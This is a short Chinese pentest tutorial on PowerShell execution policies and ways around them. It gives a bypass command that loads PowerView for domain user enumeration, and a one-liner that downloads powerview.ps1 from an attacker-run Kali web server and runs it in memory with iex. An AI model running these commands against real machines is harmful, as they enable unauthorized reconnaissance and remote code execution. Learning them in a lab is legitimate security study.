PowerShell收集信息及绕过PowerShell权限
PowerShell脚本的4种执行权限:
Restricted:默认设置,不允许任何script运行
AllSigned:只能运行经过数字证书签名的script
RemoteSigned:本地脚本不做限制,网络上下载的script就必须有数字签名
Unrestricted:允许所有的script运行,权限最高
windows默认不允许任何脚本运行,可以使用 "Set-ExecutionPolicy" cmdlet 来更改这个策略
使用PowerShell进行信息收集的步骤:
1、进入powershell
2、查看权限
3、导入脚本文件
4、执行相关命令
PowerShell有关命令:
绕过PowerShell权限的方式:
1、能够上传脚本到目标机器:
powershell.exe -executionpolicy bypass "import-module ./powerview.ps1;get-netuser"
2、不能上传脚本到目标机器:
1)能够访问到脚本(需要有Web服务器)
2)kali开启Apache服务
将powerview.ps1脚本复制到kali中var/www/html目录下
访问脚本文件
发现显示没有权限,所以修改powerview.ps1脚本权限
再次访问
在win7中输入以下命令:
powershell.exe -exec bypass -nop -c "iex(New-Object Net.WebClient).DownloadString('http://<kali的web服务的ip>/powerview.ps1');get-netuser"
